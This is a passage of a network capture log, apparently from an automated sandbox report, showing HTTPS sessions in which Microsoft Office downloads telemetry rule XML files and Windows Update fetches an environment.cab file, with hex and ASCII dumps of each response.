2024-12-07 09:52:04 UTC	192	OUT	GET /rules/rule702201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:05 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:04 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7262739" x-ms-request-id: 9a7d6e1d-d01e-00a1-4e08-4835b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095204Z-r1cf579d778qlpkrhC1EWRpfc800000002s0000000000ybk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:05 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.6	49863	4.245.163.56	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:06 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xDWM6ApMeetRAR&MD=299fFNu4 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-07 09:52:07 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 65574bfc-509d-4ac0-9fd9-a2ed26cfde49 MS-RequestId: 6f3b6b2c-9853-4954-af92-3b091875748a MS-CV: Yeb49ybz80Wc9Ezj.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 07 Dec 2024 09:52:06 GMT Connection: close Content-Length: 30005
2024-12-07 09:52:07 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-12-07 09:52:07 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.6	49864	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:06 UTC	192	OUT	GET /rules/rule700401v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:06 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:06 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDCB4853F" x-ms-request-id: 8332b9fd-c01e-0079-1704-48e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095206Z-r1cf579d778w59f9hC1EWRze6w0000000260000000003bvm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:06 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.6	49866	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:06 UTC	192	OUT	GET /rules/rule700351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:07 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:06 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFD43C07" x-ms-request-id: 812207fe-e01e-0099-5703-48da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095206Z-r1cf579d778mvsklhC1EWRkavg0000000250000000003uyx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:07 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.6	49865	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:06 UTC	192	OUT	GET /rules/rule700400v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:07 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:06 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB779FC3" x-ms-request-id: fdf36bd3-a01e-0070-1e03-48573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095206Z-r1cf579d778x776bhC1EWRdk8000000001xg000000003fr6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:07 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.6	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:06 UTC	192	OUT	GET /rules/rule700350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:07 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:06 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDD74D2EC" x-ms-request-id: a7f22c35-701e-001e-6403-48f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095206Z-r1cf579d778zvkpnhC1EWRv23g00000002cg0000000001ft x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:07 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.6	49868	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:06 UTC	192	OUT	GET /rules/rule703901v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:07 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:06 GMT Content-Type: text/xml Content-Length: 1427 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE56F6873" x-ms-request-id: 62ef0171-501e-000a-5a03-480180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095206Z-r1cf579d778qlpkrhC1EWRpfc800000002sg000000000tp4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:07 UTC	1427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.6	49870	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:08 UTC	192	OUT	GET /rules/rule703900v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:09 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:08 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 3c0425b1-401e-0047-7c03-488597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095208Z-r1cf579d778t6txphC1EWRsd4400000002k0000000000wye x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:09 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.6	49872	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:08 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:09 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:08 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 15e9867f-c01e-0046-5804-482db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095208Z-r1cf579d778zvkpnhC1EWRv23g00000002800000000028v7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:09 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.6	49871	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:08 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:09 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:09 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 315ad4be-c01e-0014-2a03-48a6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095209Z-r1cf579d778x776bhC1EWRdk80000000023g000000000rus x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:09 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.6	49874	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:08 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:09 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:09 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 123741ec-101e-008d-5b05-4892e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095209Z-r1cf579d778t5c2lhC1EWRce3w00000002s0000000000yx5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:09 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.6	49873	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:08 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
